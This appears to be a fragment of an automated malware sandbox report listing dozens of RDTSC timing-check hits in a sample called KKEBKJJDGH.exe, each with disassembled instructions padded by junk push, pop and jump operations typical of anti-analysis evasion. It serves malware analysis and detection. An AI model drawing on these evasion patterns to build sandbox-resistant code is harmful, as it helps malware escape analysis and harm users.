Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847AC second address: 4847B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4847B2 second address: 4847CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CC44211h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E609 second address: 48E60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E60D second address: 48E634 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F742CC44212h 0x0000000c jmp 00007F742CC4420Dh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A436 second address: 41A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A43C second address: 41A440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A440 second address: 41A449 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41A449 second address: 41A451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48DE14 second address: 48DE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E0FB second address: 48E0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E0FF second address: 48E124 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F742CEB81CCh 0x0000000c jo 00007F742CEB81C6h 0x00000012 jmp 00007F742CEB81CCh 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E124 second address: 48E146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F742CC44217h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E146 second address: 48E14C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E14C second address: 48E162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F742CC4420Ch 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E162 second address: 48E166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 48E166 second address: 48E16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 490A70 second address: 490A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 490A76 second address: 490A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 490A7E second address: 490A87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 494F0F second address: 494F37 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F742CC44212h 0x00000008 jmp 00007F742CC4420Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F742CC4420Ah 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 427B5E second address: 427B78 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F742CEB81CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F742CEB81CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480D55 second address: 480D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480D59 second address: 480D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 480D5F second address: 480D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 499F7E second address: 499F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 499F85 second address: 499F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 499F8B second address: 499FA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F742CEB81D0h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A23E second address: 49A242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A3DF second address: 49A404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F742CEB81C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A404 second address: 49A408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A408 second address: 49A40E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A582 second address: 49A587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A814 second address: 49A82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A9BB second address: 49A9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A9C6 second address: 49A9E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F742CEB81D2h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 49A9E6 second address: 49A9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF5F second address: 42AF65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF65 second address: 42AF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF6B second address: 42AF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81CCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42AF7D second address: 42AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A0733 second address: 4A073D instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CEB81C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A3B94 second address: 4A3B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A3B9A second address: 4A3BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A3BA0 second address: 4A3BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A80CE second address: 4A80FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CCh 0x00000009 jmp 00007F742CEB81D8h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A80FC second address: 4A8107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F742CC44206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A82AE second address: 4A82B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A83E5 second address: 4A83E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8541 second address: 4A854B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F742CEB81C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A86E1 second address: 4A86E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A86E7 second address: 4A86EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A888F second address: 4A88B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jo 00007F742CC44206h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jbe 00007F742CC44206h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F742CC44206h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A88B3 second address: 4A88EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F742CEB81DAh 0x0000000e jbe 00007F742CEB81C6h 0x00000014 jmp 00007F742CEB81CEh 0x00000019 jmp 00007F742CEB81D3h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8A67 second address: 4A8A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8A74 second address: 4A8A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8BF6 second address: 4A8BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D4B second address: 4A8D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D52 second address: 4A8D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F742CC4420Ch 0x00000010 pushad 0x00000011 jl 00007F742CC44206h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D72 second address: 4A8D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D77 second address: 4A8D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D8B second address: 4A8D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8D8F second address: 4A8D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A8EEE second address: 4A8EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A9196 second address: 4A91B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F742CC44212h 0x0000000b jc 00007F742CC44206h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A91B5 second address: 4A91BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 42E5A1 second address: 42E5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44217h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7DED second address: 4A7DF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7DF9 second address: 4A7DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7DFD second address: 4A7E07 instructions: 0x00000000 rdtsc 0x00000002 js 00007F742CEB81C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4A7E07 second address: 4A7E1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADF83 second address: 4ADF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADF87 second address: 4ADF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE0F5 second address: 4AE0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE0FE second address: 4AE102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE102 second address: 4AE12D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jl 00007F742CEB8213h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F742CEB81C6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE12D second address: 4AE146 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Ch 0x00000007 jp 00007F742CC44206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE6F7 second address: 4AE721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CAh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F742CEB81D7h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE721 second address: 4AE727 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AE727 second address: 4AE749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F742CEB81FBh 0x0000000f jc 00007F742CEB81DFh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADC7D second address: 4ADC83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADC83 second address: 4ADC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4ADC89 second address: 4ADC92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA73 second address: 4AEA7D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA7D second address: 4AEA87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA87 second address: 4AEA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA8B second address: 4AEA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jno 00007F742CC44206h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEA9D second address: 4AEAA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEAA2 second address: 4AEAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44216h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEAC2 second address: 4AEAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEC24 second address: 4AEC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44213h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AEDA8 second address: 4AEDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF025 second address: 4AF02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF02B second address: 4AF04A instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F742CEB81CFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
